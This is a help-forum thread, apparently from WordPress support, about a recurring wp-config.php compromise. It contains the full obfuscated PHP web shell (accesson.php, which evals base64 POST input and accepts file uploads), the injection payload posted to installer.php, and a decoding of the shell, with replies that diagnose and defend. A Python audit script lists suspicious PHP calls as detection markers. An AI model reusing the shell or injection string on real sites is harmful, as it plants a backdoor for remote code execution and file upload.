
I have a WordPress site that keeps severing its database connection, and I am not sure how to find, clean up or get rid of the root cause.

The issue is that this odd script keeps popping up in the wp-config.php file. I delete it and correct the credentials, and the site comes back up just fine. In about a day or so, the same thing happens: the database credentials are reset and this foreign script appears again.

This is the output I keep seeing after the attack:

    // ** MySQL settings - You can get this info from your web host ** //
    /** The name of the database for WordPress */
    define('DB_NAME', 'test');
    file_put_contents('accesson.php', '<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>'); /*');
    file_put_contents('accesson.php', '<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>'); /*');

    /** MySQL database username */
    define('DB_USER', 'user');

    /** MySQL database password */
    define('DB_PASSWORD', 'taskh60J0f');

The code seems to reference accesson.php. So I looked at that file and this is the code that it has:

    <?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>

I reset the db connection again and deleted the accesson.php file from the root directory, but am not 100% sure that this will no longer occur. My question is: how do I clean this up 100%? I also want to note that I am not a developer. I know how to read code, but am not really proficient at writing it. Any help would be greatly appreciated.

Jose-R
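One check a site owner can run after a clean-up, as an added example that is not part of the question or of WordPress itself: a Python audit of wp-config.php that reports any DB_* define whose value differs from the known-good credentials, and any line carrying calls that never belong in a config file (file_put_contents, eval, base64_decode, chr, and friends). The two config fragments below are constructed for the example, and the known-good values in KNOWN_GOOD are assumptions standing in for the real credentials.

```python
import re
import sys

# Calls and superglobals that have no business in wp-config.php; any hit is worth an alert.
SUSPICIOUS_CALLS = ("file_put_contents(", "eval(", "base64_decode(", "chr(",
                    "system(", "exec(", "$_POST", "$_FILES")

# A healthy DB_* define is one single-quoted literal and nothing else on the line.
DEFINE_RE = re.compile(r"^\s*define\(\s*'(DB_[A-Z_]+)'\s*,\s*'([^'\\]*)'\s*\)\s*;\s*$")


def audit_wp_config(text, expected):
    """Return a list of findings for one wp-config.php; an empty list means it looks intact.

    expected maps DB_* constant names to their known-good values (assumed values here)."""
    findings = []
    seen = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for marker in SUSPICIOUS_CALLS:
            if marker in line:
                findings.append(f"line {lineno}: unexpected {marker!r} in config")
                break
        stripped = line.strip()
        if stripped.startswith("define(") and "'DB_" in stripped:
            m = DEFINE_RE.match(line)
            if m is None:
                # A define that does not end cleanly is exactly what an injected value produces.
                findings.append(f"line {lineno}: malformed DB_* define: {stripped[:60]}")
                continue
            seen[m.group(1)] = m.group(2)
    for name, value in expected.items():
        if name not in seen:
            findings.append(f"{name} is missing")
        elif seen[name] != value:
            findings.append(f"{name} changed: expected {value!r}, found {seen[name]!r}")
    return findings


# Constructed samples: a clean fragment, and one shaped like the injection in the question
# (the dropper payload itself is replaced by a comment).
CLEAN = """<?php
/** The name of the database for WordPress */
define('DB_NAME', 'wp_site');
/** MySQL database username */
define('DB_USER', 'wp_user');
/** MySQL database password */
define('DB_PASSWORD', 'correct horse battery staple');
"""

INJECTED = """<?php
define('DB_NAME', 'test');
file_put_contents('accesson.php', '<?php /* dropper payload omitted */ ?>'); /*');
/** MySQL database username */
define('DB_USER', 'user');
define('DB_PASSWORD', 'changed-by-attacker');
"""

# Assumed known-good credentials; in real use, keep these outside the web root.
KNOWN_GOOD = {"DB_NAME": "wp_site", "DB_USER": "wp_user",
              "DB_PASSWORD": "correct horse battery staple"}

if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Real use: python audit.py /path/to/wp-config.php
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            report = audit_wp_config(fh.read(), KNOWN_GOOD)
    else:
        report = audit_wp_config(INJECTED, KNOWN_GOOD)
    print("\n".join(report) or "wp-config.php looks intact")
```

Run it from cron against the live file and alert whenever the list is non-empty. A hit after a clean-up tells you the write path into wp-config.php is still open, which is the actual problem; restoring the credentials only treats the symptom.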
  • You deleted what you believe to be the offending file. Has anything given you reason to believe you didn't fix the problem, or are you asking out of concern if it will come back? You may want to check out this guide: https://sucuri.net/guides/how-to-clean-hacked-wordpress. – Justin R. Oct 12 '18 at 20:06
  • This certainly looks like a hacking attempt. You should also consult with your hosting provider and check the access logs. – zipkundan Oct 12 '18 at 20:31
  • Question: do you think that changing the write permissions to read-only on the wp-config file will prevent whatever it is from overwriting the current settings? – Jose-R Oct 17 '18 at 04:21
  • @Jose-R what plugins do you have active on your site? – cameronjonesweb Nov 14 '18 at 23:12
  • I recently deleted all the plugins. The only one I have now is iThemes security. – Jose-R Nov 16 '18 at 17:59

1 Answer

Had the same attack on a site we have recently started hosting - repeated extra code added to config and accesson.php dropped into the web root.

In our instance the cause of the problem was a file named installer.php and another file named installer-backup.php - these came with the site when we imported it.

In one of our protection plug-in threat logs we found repeated POST attempts to installer and installer-backup.php, details as follows:

    "name": "POST.dbname",
        "value": "test\\');\nfile_put_contents(\\'accesson.php\\', \\'<?php echo 7457737+736723;$raPo_rZluoE=base64_decode(\\\"Y\\\".chr(109).\\\"F\\\".chr(122).chr(90).\\\"T\\\".chr(89).chr(48).chr(88).\\\"2\\\".\\\"R\\\".\\\"l\\\".\\\"Y\\\".chr(50).\\\"9\\\".chr(107).\\\"Z\\\".chr(81).\\\"=\\\".\\\"=\\\");$ydSJPtnwrSv=base64_decode(chr(89).\\\"2\\\".chr(57).chr(119).chr(101).chr(81).chr(61).\\\"=\\\");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87).\\\"Q\\\".chr(61))]));if($_POST[base64_decode(\\\"d\\\".chr(88).chr(65).\\\"=\\\")] == base64_decode(\\\"d\\\".\\\"X\\\".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90).\\\"m\\\".\\\"l\\\".\\\"s\\\".chr(90).\\\"Q\\\".\\\"=\\\".chr(61))][base64_decode(chr(100).chr(71).chr(49).\\\"w\\\".\\\"X\\\".chr(50).\\\"5\\\".chr(104).\\\"b\\\".chr(87).\\\"U\\\".chr(61))],$_FILES[base64_decode(\\\"Z\\\".chr(109).\\\"l\\\".\\\"s\\\".chr(90).\\\"Q\\\".chr(61).chr(61))][base64_decode(chr(98).\\\"m\\\".\\\"F\\\".chr(116).\\\"Z\\\".chr(81).chr(61).\\\"=\\\")]);}; ?>\\'); \/*"

This creates the accesson.php file with the code as per the original post.

Decoding that gives:

    echo 7457737+736723;
    $raPo_rZluoE = 'base64_decode';
    $ydSJPtnwrSv = 'copy';
    eval(base64_decode($_POST['id']));
    if($_POST['up'] == 'up'){copy($_FILES['file']['tmp_name'],$_FILES['file']['name']);}

So it looks like accesson.php will do what its name suggests and provide a route to copy files onto the server.

This necessitated a total wipe out and rebuild after a manual scan of the db - which did not show anything suspicious.

Nothing untoward has happened since the rebuild, except that someone is making many attempts to POST to the now non-existent installer and installer-backup.php.

Interestingly, we have so far not seen any attempts to POST to accesson.php.

Rob-G